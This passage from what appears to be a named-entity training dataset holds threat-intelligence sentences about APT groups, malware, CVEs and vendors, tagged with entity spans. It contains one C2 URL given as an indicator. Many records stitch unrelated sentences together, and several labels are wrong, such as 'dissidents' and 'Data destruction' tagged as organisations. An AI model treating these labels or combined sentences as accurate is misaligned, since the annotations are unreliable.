"cyberner_stix_train"}} {"text": "In some observed cases , these executables were self-extracting archive files containing common hacking tools , such as PSExec and Mimikatz , combined with script files that execute these tools .", "spans": {"TOOL: PSExec": [[120, 126]], "TOOL: Mimikatz": [[131, 139]]}, "info": {"id": "cyberner_stix_train_001067", "source": "cyberner_stix_train"}} {"text": "TrickBot Pushing a 2FA Bypass App to Bank Customers in Germany March 24 , 2020 IBM X-Force researchers analyzed an Android 
malware app that ’ s likely being pushed to infected users by the TrickBot Trojan . CVE-2018-0798 is an RCE vulnerability , a stack buffer overflow that can be exploited by a threat actor to perform stack corruption . We first discovered this group in mid-2016 , although it is possible their operations extends earlier than that time frame .", "spans": {"MALWARE: TrickBot": [[0, 8], [189, 197]], "ORGANIZATION: IBM X-Force": [[79, 90]], "SYSTEM: Android": [[115, 122]], "VULNERABILITY: CVE-2018-0798": [[207, 220]], "THREAT_ACTOR: threat actor": [[298, 310]]}, "info": {"id": "cyberner_stix_train_001068", "source": "cyberner_stix_train"}} {"text": "Kaspersky Lab has produced excellent research on Scarlet Mimic group . An Iranian hacking group formerly named Ajax Security ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"ORGANIZATION: Kaspersky Lab": [[0, 13]], "THREAT_ACTOR: Scarlet Mimic group": [[49, 68]], "THREAT_ACTOR: Ajax Security": [[111, 124]], "THREAT_ACTOR: Flying Kitten": [[140, 153]], "ORGANIZATION: CrowdStrike": [[159, 170]], "ORGANIZATION: dissidents": [[225, 235]]}, "info": {"id": "cyberner_stix_train_001069", "source": "cyberner_stix_train"}} {"text": "Although the propagation trend seems to be slowing down a bit , the figure tells us that RuMMS malware is still alive in the wild . Since May 2016 , we have continued to monitor and uncover various attacks and tools associated with the OilRig group . The decoded binary filename is also randomly generated based on a dictionary : Array(\"proc\" , \"chrome\" , \"winrar\") . 
None Ensure X - Forwarded - For header is configured to log true external IP addresses for request to proxied services .", "spans": {"MALWARE: RuMMS": [[89, 94]], "THREAT_ACTOR: OilRig group": [[236, 248]]}, "info": {"id": "cyberner_stix_train_001070", "source": "cyberner_stix_train"}} {"text": "This sample is a modified version of Quasar , most likely forked from open source version 1.2.0.0 on GitHub .", "spans": {"MALWARE: Quasar": [[37, 43]]}, "info": {"id": "cyberner_stix_train_001071", "source": "cyberner_stix_train"}} {"text": "This data is immediately sent to the cybercriminals and the computer displays the QR code containing a link to the alleged certificate of the online banking system . It is not a new tactic for Turla to rely on fake Flash installers to try to trick the user to install one of their backdoors . ZxShell has been observed to be distributed through phishing attacks , dropped by exploits that leverage vulnerabilities such as CVE-2011-2462 , CVE-2013-3163 , and CVE-2014-0322 . 
In each case , CrowdStrike reviewed the relevant logs and determined there was no evidence of exploitation of CVE-2022 - 41040 for initial access .", "spans": {"TOOL: fake Flash installers": [[210, 231]], "MALWARE: ZxShell": [[293, 300]], "VULNERABILITY: CVE-2011-2462": [[422, 435]], "VULNERABILITY: CVE-2013-3163": [[438, 451]], "VULNERABILITY: CVE-2014-0322": [[458, 471]], "VULNERABILITY: CVE-2022 - 41040": [[584, 600]]}, "info": {"id": "cyberner_stix_train_001072", "source": "cyberner_stix_train"}} {"text": "The ‘ onload3 ’ function will take the response to the HTTP request in ‘ onload2 ’ and treat it as the payload .", "spans": {}, "info": {"id": "cyberner_stix_train_001073", "source": "cyberner_stix_train"}} {"text": "This efficiency of operation ( a 1:1 ratio of operator to observed activity ) suggests that TG-3390 can scale to conduct the maximum number of simultaneous operations .", "spans": {"THREAT_ACTOR: TG-3390": [[92, 99]]}, "info": {"id": "cyberner_stix_train_001074", "source": "cyberner_stix_train"}} {"text": "Port 6212 : Chrome extraction service . Once exploit has been achieved , Nidiran is delivered through a self-extracting executable that extracts the components to a .tmp folder after it has been executed . 
APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx : We can not independently confirm KillMilk 's claims of having previous affiliation with the hacktivist group Universal Dark Service .", "spans": {"SYSTEM: Chrome": [[12, 18]], "TOOL: Nidiran": [[73, 80]], "TOOL: self-extracting executable": [[104, 130]], "MALWARE: .tmp": [[165, 169]], "FILEPATH: APA S-IDTY adopted resolution Unlimited support for Palestinian people.docx": [[206, 281]]}, "info": {"id": "cyberner_stix_train_001075", "source": "cyberner_stix_train"}} {"text": "This module injects code into running Google Play or GMS ( Google Mobile Services ) to mimic user behavior so Gooligan can avoid detection , a technique first seen with the mobile malware HummingBad . Kaspersky found the group was exploiting a Adobe Flash Player zero-day vulnerability ( CVE-2016-4117 ) to remotely deliver the latest version of \" FinSpy \" malware , according to a new blog post published Monday . in microcode . Anonymous Sudan", "spans": {"SYSTEM: Google Play": [[38, 49]], "SYSTEM: GMS ( Google Mobile Services )": [[53, 83]], "MALWARE: Gooligan": [[110, 118]], "MALWARE: HummingBad": [[188, 198]], "ORGANIZATION: Kaspersky": [[201, 210]], "THREAT_ACTOR: group": [[221, 226]], "VULNERABILITY: Adobe Flash Player zero-day vulnerability": [[244, 285]], "VULNERABILITY: CVE-2016-4117": [[288, 301]], "TOOL: FinSpy": [[348, 354]], "THREAT_ACTOR: Anonymous Sudan": [[430, 445]]}, "info": {"id": "cyberner_stix_train_001076", "source": "cyberner_stix_train"}} {"text": "In some samples , Bread has simply directly called the Reflect API on strings decrypted at runtime . Nearly a month later , security experts are now shining a bright light on the alert and the mysterious group behind the attack . The implementation is a userland keylogger that polls the keymap with each keystroke . 
Notably , the Telegram channel in which actors claiming to be from REvil claimed links with KillNet had been created only days before the operation began on June 15 , 2023 .", "spans": {"MALWARE: Bread": [[18, 23]], "TOOL: keylogger": [[263, 272]], "SYSTEM: Telegram channel": [[331, 347]], "THREAT_ACTOR: REvil": [[384, 389]]}, "info": {"id": "cyberner_stix_train_001077", "source": "cyberner_stix_train"}} {"text": "RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism . Hackers first actively spread bots using the Niteris exploit , and then search for infected devices at banks amongst their bots by analyzing IP addresses , cracked passwords and results of the modules performance .", "spans": {"MALWARE: RIPPER": [[0, 6]], "TOOL: Niteris": [[185, 192]], "VULNERABILITY: exploit": [[193, 200]], "ORGANIZATION: banks": [[243, 248]]}, "info": {"id": "cyberner_stix_train_001078", "source": "cyberner_stix_train"}} {"text": "Windows Defender ATP also integrates with the Windows protection stack so that protections from Windows Defender AV and Windows Defender Exploit Guard are reported in Windows Defender ATP portal , enabling SecOps personnel to centrally manage security , and as well as promptly investigate and respond to hostile activity in the network . APT40 was previously reported as TEMP.Periscope and TEMP.Jumper . The DllMain function replaces the pointer to GetModuleHandleA API with a pointer to hook routine that will return the base of the backdoor DLL when called with NULL as parameter ( instead of returing the handle to the launcher DLL ) . 
This fact was apparently unknown to Biderman and other Ashley Madison executives more than a year later when their July 2015 hack was first revealed .", "spans": {"SYSTEM: Windows Defender ATP": [[0, 20], [167, 187]], "SYSTEM: Windows": [[46, 53]], "SYSTEM: Windows Defender AV": [[96, 115]], "SYSTEM: Windows Defender Exploit Guard": [[120, 150]], "THREAT_ACTOR: APT40": [[339, 344]], "THREAT_ACTOR: TEMP.Periscope": [[372, 386]], "THREAT_ACTOR: TEMP.Jumper": [[391, 402]], "TOOL: DllMain": [[409, 416]], "TOOL: GetModuleHandleA API": [[450, 470]], "TOOL: DLL": [[544, 547], [632, 635]], "ORGANIZATION: Biderman": [[676, 684]], "ORGANIZATION: Ashley Madison executives": [[695, 720]]}, "info": {"id": "cyberner_stix_train_001079", "source": "cyberner_stix_train"}} {"text": "Their 2015 CozyDuke and CloudDuke campaigns take this to the extreme by apparently opting for speed and quantity over stealth and quality .", "spans": {"MALWARE: CozyDuke": [[11, 19]], "MALWARE: CloudDuke": [[24, 33]]}, "info": {"id": "cyberner_stix_train_001080", "source": "cyberner_stix_train"}} {"text": "APT16 actors sent spear phishing emails to two Taiwanese media organizations . Based on our analysis of Callisto Group 's usage of RCS Galileo , we believe the Callisto Group did not utilize the leaked RCS Galileo source code , but rather used the leaked readymade installers to set up their own installation of the RCS Galileo platform .", "spans": {"THREAT_ACTOR: APT16 actors": [[0, 12]], "ORGANIZATION: media organizations": [[57, 76]], "THREAT_ACTOR: Callisto Group": [[104, 118]], "MALWARE: installers": [[265, 275]]}, "info": {"id": "cyberner_stix_train_001081", "source": "cyberner_stix_train"}} {"text": "This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices . 
If a bot was installed on a network that was of interest to the hacking group , this bot was then used to upload one of the remote access programs .", "spans": {"MALWARE: malware": [[5, 12]], "FILEPATH: bot": [[140, 143]]}, "info": {"id": "cyberner_stix_train_001082", "source": "cyberner_stix_train"}} {"text": "And the C2 messages include a checksum algorithm that resembles those used in CHOPSTICK backdoor communications .", "spans": {"TOOL: C2": [[8, 10]], "MALWARE: CHOPSTICK backdoor": [[78, 96]]}, "info": {"id": "cyberner_stix_train_001083", "source": "cyberner_stix_train"}} {"text": "CTU researchers also observed evidence that the threat actors collect credentials from high-privilege network accounts and reputationally sensitive accounts , such as social media and webmail accounts .", "spans": {"ORGANIZATION: CTU": [[0, 3]]}, "info": {"id": "cyberner_stix_train_001084", "source": "cyberner_stix_train"}} {"text": "The malware basically provides a remote CMD/PowerShell terminal for the attackers , enabling them to execute scripts/commands and receive the results via HTTP requests . 
The self-extracting RAR writes a legitimate executable , an actor-created DLL called Loader.dll and a file named readme.txt to the filesystem and then executes the legitimate executable .", "spans": {"MALWARE: malware": [[4, 11]], "TOOL: CMD/PowerShell": [[40, 54]], "THREAT_ACTOR: attackers": [[72, 81]], "MALWARE: self-extracting RAR": [[174, 193]], "TOOL: DLL": [[244, 247]], "FILEPATH: Loader.dll": [[255, 265]], "FILEPATH: readme.txt": [[283, 293]]}, "info": {"id": "cyberner_stix_train_001085", "source": "cyberner_stix_train"}} {"text": "eu.eleader.mobilebanking.pekao softax.pekao.powerpay softax.pekao.mpos dk.jyskebank.mobilbank com.starfinanz.smob.android.bwmobilbanking eu.newfrontier.iBanking.mobile.SOG.Retail com.accessbank.accessbankapp com.sbi.SBIFreedomPlus com.zenithBank.eazymoney net.cts.android.centralbank com.f1soft.nmbmobilebanking.activities.main com.lb.smartpay com.mbmobile In the spring of 2014 , we noticed an increase in the volume of attack activity by the Naikon APT . Gamaredon Group is a Cyber Espionage persistent operation attributed to Russians FSB ( Federal Security Service ) in a long-term military and geo-political confrontation against the Ukrainian government and more in general against the Ukrainian military power . 
Siamesekitten has been active since 2018 and has in the past targeted oil , gas , and telecom companies .", "spans": {"THREAT_ACTOR: Naikon APT": [[444, 454]], "THREAT_ACTOR: Gamaredon": [[457, 466]], "ORGANIZATION: Russians FSB": [[529, 541]], "ORGANIZATION: Federal Security Service": [[544, 568]], "ORGANIZATION: Ukrainian government": [[639, 659]], "THREAT_ACTOR: Siamesekitten": [[719, 732]], "ORGANIZATION: oil , gas , and telecom companies": [[789, 822]]}, "info": {"id": "cyberner_stix_train_001086", "source": "cyberner_stix_train"}} {"text": "Of note , the Company name Grizli777 is indicative of a cracked version of Microsoft Word .", "spans": {"ORGANIZATION: Grizli777": [[27, 36]], "ORGANIZATION: Microsoft": [[75, 84]], "TOOL: Word": [[85, 89]]}, "info": {"id": "cyberner_stix_train_001087", "source": "cyberner_stix_train"}} {"text": "Lookout notified Google of the potential threat shortly after it was discovered . While the URL acts similarly to how eye-watch.in : 443 delivers payloads , we also saw the URL leveraging and exploiting security flaws in Flash : CVE-2015-8651 , CVE-2016-1019 , and CVE-2016-4117 . 
The group mainly targets the telecommunications and IT services sectors .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "ORGANIZATION: Google": [[17, 23]], "VULNERABILITY: CVE-2015-8651": [[229, 242]], "VULNERABILITY: CVE-2016-1019": [[245, 258]], "VULNERABILITY: CVE-2016-4117": [[265, 278]], "ORGANIZATION: telecommunications": [[310, 328]], "ORGANIZATION: IT services sectors": [[333, 352]]}, "info": {"id": "cyberner_stix_train_001088", "source": "cyberner_stix_train"}} {"text": "We found this could be used to supply compelling “ victim data ” to convince the attacker to connect to this “ victim ” via the GUI .", "spans": {}, "info": {"id": "cyberner_stix_train_001089", "source": "cyberner_stix_train"}} {"text": "Based on the similarity of the naming convention and data format , we believe the Spark backdoor could be an evolution of the backdoor mentioned in Operation Parliament , or at least inspired by the malware .", "spans": {"MALWARE: Spark backdoor": [[82, 96]]}, "info": {"id": "cyberner_stix_train_001090", "source": "cyberner_stix_train"}} {"text": "The malware may communicate with its command and control (C2) server over The Onion Router (Tor) network if configured to do so . The Korean-language Word document manual.doc appeared in Vietnam on January 17 , with the original author name of Honeybee .", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: Word document": [[150, 163]], "FILEPATH: manual.doc": [[164, 174]], "THREAT_ACTOR: Honeybee": [[244, 252]]}, "info": {"id": "cyberner_stix_train_001091", "source": "cyberner_stix_train"}} {"text": "Further investigation showed that the malware , which we named BusyGasper , is not all that sophisticated , but demonstrates some unusual features for this type of threat . McAfee Advanced Threat Research analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact . 
Gpppassword : Tool used to obtain and decrypt Group Policy Preferences ( GPP ) passwords . Data destruction may also be used to render operator interfaces unable to respond and to disrupt response functions from occurring as expected .", "spans": {"MALWARE: BusyGasper": [[63, 73]], "ORGANIZATION: McAfee Advanced Threat Research": [[173, 204]], "THREAT_ACTOR: cybercrime group": [[300, 316]], "THREAT_ACTOR: Lazarus": [[317, 324]], "TOOL: sophisticated malware": [[335, 356]], "MALWARE: Gpppassword": [[381, 392]], "ORGANIZATION: Data destruction": [[472, 488]]}, "info": {"id": "cyberner_stix_train_001092", "source": "cyberner_stix_train"}} {"text": "However , GeminiDuke samples compiled after MSK was altered still vary the timezone between UTC+3 in the winter and UTC+4 during the summer .", "spans": {"MALWARE: GeminiDuke": [[10, 20]]}, "info": {"id": "cyberner_stix_train_001093", "source": "cyberner_stix_train"}} {"text": "The first time the Lambert family malware was uncovered publicly was in October 2014 , when FireEye posted a blog about a zero day exploit ( CVE-2014-4148 ) used in the wild . APT Anchor Panda is a Chinese threat actor group who target maritime operations .", "spans": {"TOOL: Lambert family malware": [[19, 41]], "ORGANIZATION: FireEye": [[92, 99]], "VULNERABILITY: zero day exploit": [[122, 138]], "VULNERABILITY: CVE-2014-4148": [[141, 154]]}, "info": {"id": "cyberner_stix_train_001094", "source": "cyberner_stix_train"}} {"text": "CHANGE_GCM_ID – change GCM ID . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . 
The Leafminer operators use EternalBlue to attempt lateral movement within target networks from compromised staging servers .", "spans": {"MALWARE: Backdoor.Nidiran": [[141, 157]], "THREAT_ACTOR: Leafminer": [[264, 273]], "THREAT_ACTOR: operators": [[274, 283]], "VULNERABILITY: EternalBlue": [[288, 299]]}, "info": {"id": "cyberner_stix_train_001095", "source": "cyberner_stix_train"}} {"text": "The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with py2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation ( WMI ) system , which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on a specific schedule .", "spans": {"THREAT_ACTOR: COZY BEAR": [[4, 13]], "MALWARE: SeaDaddy": [[48, 56]], "TOOL: Python": [[78, 84]], "TOOL: py2exe": [[103, 109]], "TOOL: Powershell": [[122, 132]], "SYSTEM: Windows": [[176, 183]], "TOOL: Management Instrumentation": [[184, 210]], "TOOL: WMI": [[213, 216]]}, "info": {"id": "cyberner_stix_train_001096", "source": "cyberner_stix_train"}} {"text": "Traps detects and blocks malicious behavior exhibited by new , unknown Quasar samples .", "spans": {"TOOL: Traps": [[0, 5]], "MALWARE: Quasar": [[71, 77]]}, "info": {"id": "cyberner_stix_train_001097", "source": "cyberner_stix_train"}} {"text": "Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . 
The analyzed RTF files share the same object dimension (objw2180\\objh300) used to track the RTF weaponizer in our previous report , however , the sample was not exploiting CVE-2017-11882 or CVE-2018-0802 .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "FILEPATH: sample": [[279, 285]], "VULNERABILITY: CVE-2017-11882": [[305, 319]], "VULNERABILITY: CVE-2018-0802": [[323, 336]]}, "info": {"id": "cyberner_stix_train_001098", "source": "cyberner_stix_train"}} {"text": "EventBot infected device to be sent to the C Information gathered about the infected device to be sent to the C2 . In 2017 , the same entities that were affected by the Okrum malware and by the 2015 Ketrican backdoors again became targets of the malicious actors . Since at least 2014 , APT32 , also known as the OceanLotus Group , has targeted foreign corporations foreign governments .", "spans": {"MALWARE: EventBot": [[0, 8]], "MALWARE: Okrum malware": [[169, 182]], "MALWARE: Ketrican backdoors": [[199, 217]], "THREAT_ACTOR: APT32": [[287, 292]], "THREAT_ACTOR: OceanLotus Group": [[313, 329]], "ORGANIZATION: foreign corporations": [[345, 365]], "ORGANIZATION: governments": [[374, 385]]}, "info": {"id": "cyberner_stix_train_001099", "source": "cyberner_stix_train"}} {"text": "However , at this time we do not believe the April attacks used AntSword based on artifacts analyzed on the SharePoint server , specifically none of the IIS logs in the April attacks used the AntSword User-Agent in requests to the webshell that were observed in the current attacks .", "spans": {"TOOL: SharePoint": [[108, 118]], "TOOL: IIS": [[153, 156]], "TOOL: AntSword": [[192, 200]], "TOOL: User-Agent": [[201, 211]]}, "info": {"id": "cyberner_stix_train_001100", "source": "cyberner_stix_train"}} {"text": "Since 2013 , the Cobalt have attempted to attack banks and financial institutions using pieces of malware they designed . 
In addition to the original \" Infy \" variant , we also see the newer , more sophisticated , interactive , and fuller-featured \" Infy M \" variant deployed against apparently-higher-value targets .", "spans": {"THREAT_ACTOR: Cobalt": [[17, 23]], "ORGANIZATION: banks": [[49, 54]], "ORGANIZATION: financial institutions": [[59, 81]], "MALWARE: Infy": [[152, 156]], "MALWARE: Infy M": [[250, 256]]}, "info": {"id": "cyberner_stix_train_001101", "source": "cyberner_stix_train"}} {"text": "Each instance had between 100,000 and 500,000 downloads according to Google Play statistics , reaching an aggregated infection rate of between 200,000 and 1 million users . The malicious documents that Unit 42 examined contained legitimate decoy lures as well as malicious embedded EPS files targeting the CVE-2015-2545 and CVE-2017-0261 vulnerabilities . Several of these provide enterprise services or cloud hosting , supporting our assessment that APT10 are almost certainly targeting MSPs .", "spans": {"SYSTEM: Google Play": [[69, 80]], "ORGANIZATION: Unit 42": [[202, 209]], "MALWARE: EPS files": [[282, 291]], "VULNERABILITY: CVE-2015-2545": [[306, 319]], "VULNERABILITY: CVE-2017-0261": [[324, 337]], "THREAT_ACTOR: APT10": [[451, 456]], "ORGANIZATION: MSPs": [[488, 492]]}, "info": {"id": "cyberner_stix_train_001102", "source": "cyberner_stix_train"}} {"text": "At this time , the Trojan also began actively using different methods of obfuscation . These emails included recruitment-themed lures and links to malicious HTML application ( HTA ) files . 
WannaCry leverages an exploit , codenamed \" EternalBlue \" , that was released by the Shadow Brokers on April 14 , 2017 .", "spans": {"TOOL: HTML application": [[157, 173]], "MALWARE: HTA": [[176, 179]], "MALWARE: WannaCry": [[190, 198]], "VULNERABILITY: exploit": [[212, 219]], "VULNERABILITY: EternalBlue": [[234, 245]], "THREAT_ACTOR: Shadow Brokers": [[275, 289]]}, "info": {"id": "cyberner_stix_train_001103", "source": "cyberner_stix_train"}} {"text": "CVE-2017-0143 was also used by two other exploit tools—EternalRomance and EternalSynergy—that were released as part of the Shadow Brokers leak in April 2017 . In June we published on a previously unknown group we named \" Bahamut \" , a strange campaign of phishing and malware apparently focused on the Middle East and South Asia .", "spans": {"VULNERABILITY: CVE-2017-0143": [[0, 13]], "MALWARE: tools—EternalRomance": [[49, 69]], "MALWARE: EternalSynergy—that": [[74, 93]], "THREAT_ACTOR: Bahamut": [[221, 228]]}, "info": {"id": "cyberner_stix_train_001104", "source": "cyberner_stix_train"}} {"text": "Finally , early CozyDuke versions also featured other elements that one would associate more with a traditional software development project than with malware .", "spans": {"MALWARE: CozyDuke": [[16, 24]]}, "info": {"id": "cyberner_stix_train_001105", "source": "cyberner_stix_train"}} {"text": "Quasar serve is vulnerable to a simple DLL hijacking attack , by using this technique to replace server DLLs .", "spans": {"MALWARE: Quasar": [[0, 6]], "TOOL: DLL": [[39, 42]]}, "info": {"id": "cyberner_stix_train_001106", "source": "cyberner_stix_train"}} {"text": "Further research identified dozens of Dowenks and Quasar samples related to these attackers .", "spans": {"MALWARE: Dowenks": [[38, 45]], "MALWARE: Quasar": [[50, 56]]}, "info": {"id": "cyberner_stix_train_001107", "source": "cyberner_stix_train"}} {"text": "All of its capabilities are discussed later in this blog . 
Exploit and tools continued to be used after Buckeye's apparent disappearance in 2017 . Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": {"THREAT_ACTOR: Buckeye's": [[104, 113]], "MALWARE: Winnti": [[159, 165]]}, "info": {"id": "cyberner_stix_train_001108", "source": "cyberner_stix_train"}} {"text": "The researchers believe that the devices somehow had the malware pre-loaded at the time of shipping from the manufacturer , or was likely distributed inside modified Android firmware . Between June 2008 and March 2009 the Information Warfare Monitor conducted an extensive and exhaustive two-phase investigation focused on allegations of Chinese cyber espionage against the Tibetan community . APT1 has a well-defined attack methodology , honed over years and designed to steal large volumes of valuable intellectual property . The web page “ about.htm ” implements an exploit for Microsoft Internet Explorer 8 .", "spans": {"SYSTEM: Android": [[166, 173]], "ORGANIZATION: Tibetan community": [[374, 391]], "THREAT_ACTOR: APT1": [[394, 398]], "SYSTEM: Microsoft Internet Explorer 8": [[581, 610]]}, "info": {"id": "cyberner_stix_train_001109", "source": "cyberner_stix_train"}} {"text": "Silence.MainModule is a typical remote control Trojan that provides access to the command shell CMD.EXE with the possibility of downloading files from remote nodes to a computer and uploading files from a computer to a remote server . 
From early June , when the cyber-attack on the Japan Pension Service started to be reported widely , various Japanese organizations would have started to deploy protection measures .", "spans": {"MALWARE: Silence.MainModule": [[0, 18]], "MALWARE: CMD.EXE": [[96, 103]], "ORGANIZATION: Pension Service": [[288, 303]]}, "info": {"id": "cyberner_stix_train_001110", "source": "cyberner_stix_train"}} {"text": "CrowdStrike Intelligence first identified new GandCrab ransomware deployment tactics in mid-February , when a threat actor was observed performing actions on a victim host in order to install GandCrab . Aside from the four companies which have publicly acknowledged attacks , Symantec has identified five other large technology firms compromised by Butterfly , primarily headquartered in the US .", "spans": {"ORGANIZATION: CrowdStrike Intelligence": [[0, 24]], "TOOL: GandCrab ransomware": [[46, 65]], "TOOL: GandCrab": [[192, 200]], "ORGANIZATION: Symantec": [[276, 284]], "ORGANIZATION: technology firms": [[317, 333]]}, "info": {"id": "cyberner_stix_train_001111", "source": "cyberner_stix_train"}} {"text": "Following simple best practices , like strictly downloading applications or any files from trusted sources and being wary of unsolicited messages , can also prevent similar attacks from compromising devices . The targets of TG-4127 include military , government and defense sectors . As with the text mode receiver, the query is made with a direct connection to the controller IP address as opposed to allowing the query to propagate the native DNS . 
Earlier campaigns used an executable downloader , while the later ones used DLLs for the next stage .", "spans": {"THREAT_ACTOR: TG-4127": [[224, 231]], "ORGANIZATION: military": [[240, 248]], "ORGANIZATION: government": [[251, 261]], "ORGANIZATION: defense sectors": [[266, 281]], "TOOL: executable downloader": [[477, 498]], "TOOL: DLLs": [[527, 531]]}, "info": {"id": "cyberner_stix_train_001112", "source": "cyberner_stix_train"}} {"text": "The group has used phishing emails with Flash animation attachments to download and execute Daserf malware , and has also leveraged Flash exploits for SWC attacks . It's now relying on a new DNS-based attack technique to better cloak command and control communications between Greenbug and the malware \" , said Dennis Schwarz , research analyst on Arbor 's ASERT Team , in an interview with Threatpost .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "TOOL: Daserf malware": [[92, 106]], "VULNERABILITY: Flash exploits": [[132, 146]], "MALWARE: DNS-based attack technique": [[191, 217]], "ORGANIZATION: Arbor 's ASERT Team": [[348, 367]]}, "info": {"id": "cyberner_stix_train_001113", "source": "cyberner_stix_train"}} {"text": "A big chunk of data is extracted from the portable executable ( PE ) file itself and decrypted two times using a custom XOR algorithm . Lotus Blossom was attempting to exploit CVE-2014-6332 to install a new version of the Emissary Trojan , specifically version 5.3 . Recent versions of the malware include an “ auto-update ” mechanism , using C&C server http://checkin.travelsanignacio.com . 
CrowdStrike Services recently investigated several Play ransomware intrusions where the common entry vector was suspected to be the Microsoft Exchange ProxyNotShell vulnerabilities CVE-2022 - 41040 and CVE-2022 - 41082 .", "spans": {"THREAT_ACTOR: Lotus Blossom": [[136, 149]], "VULNERABILITY: CVE-2014-6332": [[176, 189]], "TOOL: Emissary Trojan": [[222, 237]], "URL: http://checkin.travelsanignacio.com": [[354, 389]], "ORGANIZATION: CrowdStrike Services": [[392, 412]], "THREAT_ACTOR: Play ransomware intrusions": [[443, 469]], "VULNERABILITY: Microsoft Exchange ProxyNotShell": [[524, 556]], "VULNERABILITY: CVE-2022 - 41040": [[573, 589]], "VULNERABILITY: CVE-2022 - 41082": [[594, 610]]}, "info": {"id": "cyberner_stix_train_001114", "source": "cyberner_stix_train"}} {"text": "Most malware found on Google Play contains only a dropper that later downloads the real malicious components to the device . In September 2017 , we discovered Silence attack on financial institutions . One of the servers is a Griffon C2, and the other one , an AveMaria C2 . By analyzing field data we see a gap in the implementation of CSP , and even for sites that do use it correctly , this creates an open window to exfiltrate data .", "spans": {"SYSTEM: Google Play": [[22, 33]], "ORGANIZATION: financial institutions": [[177, 199]], "MALWARE: Griffon": [[226, 233]], "MALWARE: AveMaria": [[261, 269]], "TOOL: C2": [[270, 272]], "VULNERABILITY: a gap in the implementation of CSP": [[306, 340]], "SYSTEM: sites": [[356, 361]]}, "info": {"id": "cyberner_stix_train_001115", "source": "cyberner_stix_train"}} {"text": "The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant . 
Although the developers of Bookworm have included only keylogging functionality in Bookworm as a core ability , as suggested in Table 1 , several of the embedded DLLs provide Leader with cryptographic and hashing functions , while others support Leader 's ability to communicate with its C2 server .", "spans": {"TOOL: IndiaBravo-PapaAlfa installer": [[4, 33]], "MALWARE: Bookworm": [[117, 125], [173, 181]], "MALWARE: Leader": [[336, 342]], "TOOL: C2": [[378, 380]]}, "info": {"id": "cyberner_stix_train_001116", "source": "cyberner_stix_train"}} {"text": "Apart from general information about the device , the Trojan sends a list of all the running processes and installed applications to the C & C . The email contained an attachment named Seminar-Invitation.doc , which is a malicious Microsoft Word document we track as ThreeDollars . CTU researchers assess this as the continuation of activity first observed in 2016 , and it is likely that the campaign is ongoing .", "spans": {"MALWARE: Seminar-Invitation.doc": [[185, 207]], "TOOL: Microsoft Word": [[231, 245]], "TOOL: ThreeDollars": [[267, 279]], "ORGANIZATION: CTU": [[282, 285]]}, "info": {"id": "cyberner_stix_train_001117", "source": "cyberner_stix_train"}} {"text": "Once Domain Controller access was acquired , Pinchy Spider used the enterprise 's own IT systems management software , LANDesk , to deploy a loader to hosts across the enterprise . Butterfly has also shown an interest in the commodities sector , attacking two major companies involved in gold and oil in late 2014 .", "spans": {"TOOL: LANDesk": [[119, 126]], "THREAT_ACTOR: Butterfly": [[181, 190]], "ORGANIZATION: commodities sector": [[225, 243]], "ORGANIZATION: gold": [[288, 292]], "ORGANIZATION: oil": [[297, 300]]}, "info": {"id": "cyberner_stix_train_001118", "source": "cyberner_stix_train"}} {"text": "Stolen data will also be encrypted and sent to the C & C server via the socket connection . 
ScarCruft is a relatively new APT group ; victims have been observed in several countries , including Russia , Nepal , South Korea , China , India , Kuwait and Romania . Here is a PowerLinks style method used by the attackers to achieve persistence and execute the GRIFFON implant at each user logon . Greatness offers the ability for users to bypass targets ’ multi - factor authentication protections , IP filtering and integration with Telegram bots .", "spans": {"THREAT_ACTOR: ScarCruft": [[92, 101]], "TOOL: PowerLinks": [[272, 282]], "MALWARE: GRIFFON": [[357, 364]], "TOOL: Greatness": [[394, 403]]}, "info": {"id": "cyberner_stix_train_001119", "source": "cyberner_stix_train"}} {"text": "Eset‍ has published a report on the state-sponsored Russian turla apt group ‍. The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper .", "spans": {"ORGANIZATION: Eset‍": [[0, 5]], "THREAT_ACTOR: turla": [[60, 65]], "FILEPATH: MSIL dropper": [[127, 139]], "TOOL: PDF": [[178, 181]], "FILEPATH: Javascript (JS) dropper": [[194, 217]]}, "info": {"id": "cyberner_stix_train_001120", "source": "cyberner_stix_train"}} {"text": "Within Unit 74455 , Officer Aleksy Potemkin—a department supervisor—oversaw information operations infrastructure .", "spans": {"THREAT_ACTOR: Unit 74455": [[7, 17]]}, "info": {"id": "cyberner_stix_train_001121", "source": "cyberner_stix_train"}} {"text": "It is interesting to see that the group has expanded their operation to other regions , such as the United States and Europe . But with the West African gang we’ve named Scattered Canary , we have a deeper look at how business email compromise is connected to the rest of the cybercrime . 
